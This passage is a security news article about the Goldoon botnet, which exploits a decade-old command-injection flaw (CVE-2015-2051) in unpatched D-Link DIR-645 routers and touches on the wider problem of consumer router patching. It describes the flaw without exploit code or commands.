New Botnet ‘Goldoon’ Targets D-Link Devices

Hackers are taking advantage of D-Link home routers left unpatched for a decade and turning them into a newly formed botnet researchers dubbed “Goldoon.”

See Also: Cyber Hygiene and Asset Management Perception vs. Reality

Researchers at FortiGuard Labs identified the botnet in April and discovering that hackers assembling it are using a 2015 vulnerability tracked as CVE-2015-2051 present in D-Link DIR-645 model, which first retailed in 2011. The remote code execution flaw was patched in 2015.

The vulnerability allows attackers to execute arbitrary commands remotely via the proprietary Home Network Administration Protocol. Attackers send an HTTP request with a malicious command. HNAP is a SOAP-based protocol that Cisco acquired in 2008; D-Link used it to connect routers to a setup wizard. Analysis by a hacker in 2015 says that the HNAP web server skipped authentication checks when parsing a HTTP with the header GetDeviceSettings, allowing for code injection.

Inconsistent application of patches in consumer-grade routers is a well-known issue that often stems from manufacturer delays in developing updates or consumer neglect in installing them. A U.S. 2018 study based on internet scans of 186 routers says that 83% of sampled routers…